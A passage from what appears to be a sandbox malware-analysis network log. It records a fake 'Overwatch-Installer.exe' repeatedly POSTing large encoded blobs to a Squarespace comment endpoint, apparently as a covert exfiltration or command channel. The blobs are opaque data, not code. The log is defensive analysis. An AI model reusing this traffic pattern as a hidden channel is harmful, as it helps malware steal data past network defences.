2024-09-01 20:04:29 UTC	16306	OUT	Data Raw: 36 4d 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 Data Ascii: 6MOG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtef
2024-09-01 20:04:29 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:29 UTC	16306	OUT	Data Raw: 42 36 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 Data Ascii: B6ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rW
2024-09-01 20:04:29 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:29 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSUforJ9TUnwODRmYjdkZDllMzliNTU4Y2U0YmM3OWFjZTc0OTdk; Path=/; Secure Set-Cookie: crumb=BTB3fq3ZgIweNTU3YjQwYjhjZDU5ZjQxNDA4MmI1M2JlNWM3ZDQx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8oBlpQoe/DwHbCirI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTB3fq3ZgIweNTU3YjQwYjhjZDU5ZjQxNDA4MmI1M2JlNWM3ZDQx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49753	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:29 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:29 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:29 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:29 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:29 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bcj15oBi0rW7NzRlMmU0NDE5ZmZkZGEyMWQyZmRlNjNkMWFlMDJl; Path=/; Secure Set-Cookie: crumb=BbnOHSr_DvJ3ODZiZGEwMWNhM2QzYmQ0NTMwYTU5OGI4N2RjOWM5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: tyQZKbeD/iZQouGGj Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbnOHSr_DvJ3ODZiZGEwMWNhM2QzYmQ0NTMwYTU5OGI4N2RjOWM5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49755	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:30 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:30 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:30 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:30 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BaJyXOXuEvJsMzVhNzhjMGUyNGU5YjVjYzZkZGVmY2FmM2UzMDhm; Path=/; Secure Set-Cookie: crumb=BTIS48uHhpbLMzVjYzk0NzY1ZTFmNGZkZWViMWFhZTUwZjhjZDQx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: z1B2uIw2/oC1SpT2m Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTIS48uHhpbLMzVjYzk0NzY1ZTFmNGZkZWViMWFhZTUwZjhjZDQx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49756	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:30 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:30 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:30 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:31 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bfy2CMHHeRq1MjgzMWI0N2MyY2RlNWNiMjdkNmY5YTM5OWNmNjIx; Path=/; Secure Set-Cookie: crumb=BdfMiuUsiXyVNTNkODM0OTBhNTA5NjY1ZDEzM2YxNzc4OTljZDg4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: E79NPEZ5/0tKzP4XB Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdfMiuUsiXyVNTNkODM0OTBhNTA5NjY1ZDEzM2YxNzc4OTljZDg4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49757	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:31 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:31 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:31 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:31 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:31 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BX6wAQcJyQJnZTFiM2U5NzI0YTg4ZGNhNzI4ZDJlZGMzNDhiYzMw; Path=/; Secure Set-Cookie: crumb=BZ6-SBWGzPOOZTA0ZDg0ZGFlZmQ0YTY0MTY3M2RiYWI3NzZmYWNm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: QVH200oq/W1IU5K1A Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ6-SBWGzPOOZTA0ZDg0ZGFlZmQ0YTY0MTY3M2RiYWI3NzZmYWNm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49758	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:31 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108470 Expect: 100-continue
2024-09-01 20:04:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:31 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:31 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 56 4e 61 37 77 6f 63 7a 76 30 51 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BVNa7woczv0QAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:31 UTC	1	OUT	Data Raw: 6f Data Ascii: o
2024-09-01 20:04:31 UTC	16306	OUT	Data Raw: 78 35 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 Data Ascii: x5%2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BC
2024-09-01 20:04:31 UTC	1	OUT	Data Raw: 75 Data Ascii: u
2024-09-01 20:04:31 UTC	16306	OUT	Data Raw: 56 37 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 Data Ascii: V7HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMts
2024-09-01 20:04:31 UTC	1	OUT	Data Raw: 5a Data Ascii: Z
2024-09-01 20:04:31 UTC	16306	OUT	Data Raw: 36 4d 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 Data Ascii: 6MOG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtef
2024-09-01 20:04:31 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:31 UTC	16306	OUT	Data Raw: 42 36 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 Data Ascii: B6ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rW
2024-09-01 20:04:31 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:31 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRdY8XoZgE-sYzg1ZTkzNmI4NzI0NDZmZDU0MGZkM2ZjNjNiODcx; Path=/; Secure Set-Cookie: crumb=BchTaT2YlcNbMjNkZGMxNTU1NjM2MDAxMDE3ODJkODRmNDdiZDcy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: jclKsOuf/89hcxAzE Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BchTaT2YlcNbMjNkZGMxNTU1NjM2MDAxMDE3ODJkODRmNDdiZDcy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49759	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:32 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108470 Expect: 100-continue
2024-09-01 20:04:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:32 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 57 4a 43 65 4a 68 48 43 4c 52 4a 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 